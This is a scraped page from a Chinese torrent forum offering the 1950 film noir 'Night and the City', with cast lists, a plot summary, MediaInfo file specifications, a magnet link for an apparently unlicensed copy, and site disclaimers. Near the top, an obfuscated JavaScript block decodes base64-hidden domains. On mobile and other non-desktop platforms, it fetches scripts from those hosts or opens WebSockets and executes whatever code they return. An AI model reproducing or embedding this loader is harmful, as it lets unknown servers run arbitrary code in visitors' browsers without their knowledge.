四海本色[简体字幕]Night.and.the.City.1950.1080p.FriDay.WEB-DL.H264.AAC-迅雷下载 2.62GB

版主小s 9天前 264

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 四海本色 / 黑地狱 / 夜与城市

◎片 名 Night and the City

◎年 代 1950

◎产 地 英国 / 美国

◎类 别 悬疑 / 惊悚 / 犯罪 / 运动 / 黑色电影

◎语 言 英语

◎上映日期 1950-04(英国)

◎IMDb链接 https://www.imdb.com/title/tt0042788/

◎豆瓣评分 8.3/10 (2863人评价)

◎豆瓣链接 https://movie.douban.com/subject/1305032/

◎片 长 101分钟

◎导 演 朱尔斯·达辛 Jules Dassin (id:1036836)

◎编 剧 乔·艾辛格 Jo Eisinger (id:1023799)

杰拉尔德·克什 Gerald Kersh (id:1051518)

奥斯汀·登普斯特 Austin Dempster (id:1034532)

◎演 员 理查德·威德马克 Richard Widmark (id:1013946)

吉恩·蒂尔尼 Gene Tierney (id:1040650)

乔姬·韦瑟斯 Googie Withers (id:1032561)

休·马洛威 Hugh Marlowe (id:1007161)

弗朗西斯·L·沙利文 Francis L. Sullivan (id:1158967)

赫伯特·罗姆 Herbert Lom (id:1049875)

斯坦尼斯劳斯·兹比什科 Stanislaus Zbyszko (id:1167560)

迈克·马祖尔凯 Mike Mazurki (id:1120651)

查尔斯·法雷尔 Charles Farrell (id:1086906)

埃达·里夫 Ada Reeve (id:1139289)

肯·里士满 Ken Richmond (id:1144872)

阿德莱德·霍尔 Adelaide Hall (id:1094722)

埃利奥特·梅卡姆 Eliot Makeham (id:1117929)

贝蒂·马斯登 Betty Marsden (id:1125600)

德里克·布洛姆菲尔德 Derek Blomfield (id:1062042)

克利福德·巴克顿 Clifford Buckton (id:1078742)

欧内斯特·布彻 Ernest Butcher (id:1068428)

彼得·巴特沃思 Peter Butterworth (id:1071795)

爱德华 切普曼 Edward Chapman (id:1075230)

帕特里夏·戴维森 Patricia Davidson (id:1194389)

莫琳·德莱尼 Maureen Delaney (id:1083197)

奥布里·德克斯特 Aubrey Dexter (id:1088380)

斯坦利·埃斯卡内 Stanley Escane (id:1082497)

詹姆斯·海特 James Hayter (id:1092373)

凯·肯戴尔 Kay Kendall (id:1018215)

阿瑟·洛夫格罗夫 Arthur Lovegrove (id:1116517)

费迪·梅恩 Ferdy Mayne (id:1117002)

吉布·麦克劳克林 Gibb McLaughlin (id:1119490)

麦克唐纳·帕克 MacDonald Parke (id:1131489)

查尔斯·巴顿 Charles Paton (id:1135048)

菲利普·雷 Philip Ray (id:1144331)

约翰尼·斯科菲尔德 Johnnie Schofield (id:1147239)

约翰·夏普 John Sharp (id:1025474)

阿兰·提尔文 Alan Tilvern (id:1041636)

C·丹尼尔·沃伦 C. Denier Warren (id:1025811)

布莱恩·韦斯克 Brian Weske (id:1168514)

达里尔·F·扎努克 Darryl F. Zanuck (id:1054366)

萨缪尔·G·恩格尔 Samuel G. Engel (id:1017276)

Benjamin Frankel Benjamin Frankel (id:1008234)

弗朗茨·沃克斯曼 Franz Waxman (id:1016824)

穆茨·格林鲍姆 Mutz Greenbaum (id:1008325)

Nick DeMaggio Nick DeMaggio (id:1017341)

小道格拉斯·范朋克 Douglas Fairbanks Jr. (id:1036769)

Percy Hermes Percy Hermes (id:1096204)

Douglas Hermes Douglas Hermes (id:1098770)

John Street John Street (id:1151843)

◎标 签 英国 / 朱尔斯·达辛 / 黑色电影 / 黑色 / 1950 / 犯罪 / 英国电影 / 1950s

◎简 介

哈瑞(理查德·威德马克 Richard Widmark 饰)是一名卑微的皮条客,然而,他从来都没有满足于现状过,而是不断地想找到能够发家致富的门道。一次偶然中,哈瑞结识了名叫乔治(Stanislaus Zbyszko 饰)的摔跤运动员,两人一拍即合,决定组织一场摔跤比赛以谋取暴利。

哈瑞找来了当红摔跤手史瑞乐(Mike Mazurki 饰)对阵乔治的手下尼古拉斯(Ken Richmond 饰),一时间,这场巅峰对决成为了当地人人乐道的传奇。哈瑞的高调惹恼了垄断当地摔跤比赛收益的黑帮,除此之外,乔治的儿子也对哈瑞表示了强烈的不满,与此同时,酒吧老板菲力(Francis L. Sullivan 饰)亦想借此机会除掉这个和自己老婆海伦(乔姬·韦瑟斯 Googie Withers 饰)有一腿的无赖。一场意外的发生让乔治不幸去世,也让哈瑞惹上了杀身之祸。

  1. General

  2. Unique ID : 3951727194148249039408257880653020220 (0x2F91331770A0186A9DBA24FCEEFBC3C)

  3. Complete name : [email protected]Q.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 2.62 GiB

  7. Duration : 1 h 35 min

  8. Overall bit rate : 3 925 kb/s

  9. Encoded date : UTC 2021-07-17 15:18:22

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 1 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 1 frame

  20. Format settings, GOP : M=1, N=60

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 1 h 35 min

  23. Bit rate mode : Constant

  24. Bit rate : 3 797 kb/s

  25. Nominal bit rate : 4 000 kb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 29.970 (30000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.061

  36. Stream size : 2.53 GiB (97%)

  37. Language : English

  38. Default : Yes

  39. Forced : No


  40. Audio

  41. ID : 2

  42. Format : AAC LC

  43. Format/Info : Advanced Audio Codec Low Complexity

  44. Codec ID : A_AAC-2

  45. Duration : 1 h 35 min

  46. Bit rate : 125 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : L R

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 46.875 FPS (1024 SPF)

  51. Compression mode : Lossy

  52. Stream size : 85.6 MiB (3%)

  53. Language : English

  54. Default : Yes

  55. Forced : No


  56. Text

  57. ID : 3

  58. Format : UTF-8

  59. Codec ID : S_TEXT/UTF8

  60. Codec ID/Info : UTF-8 Plain Text

  61. Duration : 1 h 35 min

  62. Bit rate : 56 b/s

  63. Count of elements : 1344

  64. Stream size : 39.6 KiB (0%)

  65. Title : Chinese Simplified

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


TAGS 惊悚 悬疑 犯罪 运动 黑色电影

磁力链:
  • magnet:?xt=urn:btih:7AA65DA783AC03736C2B24FD2A7146686300AB0E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回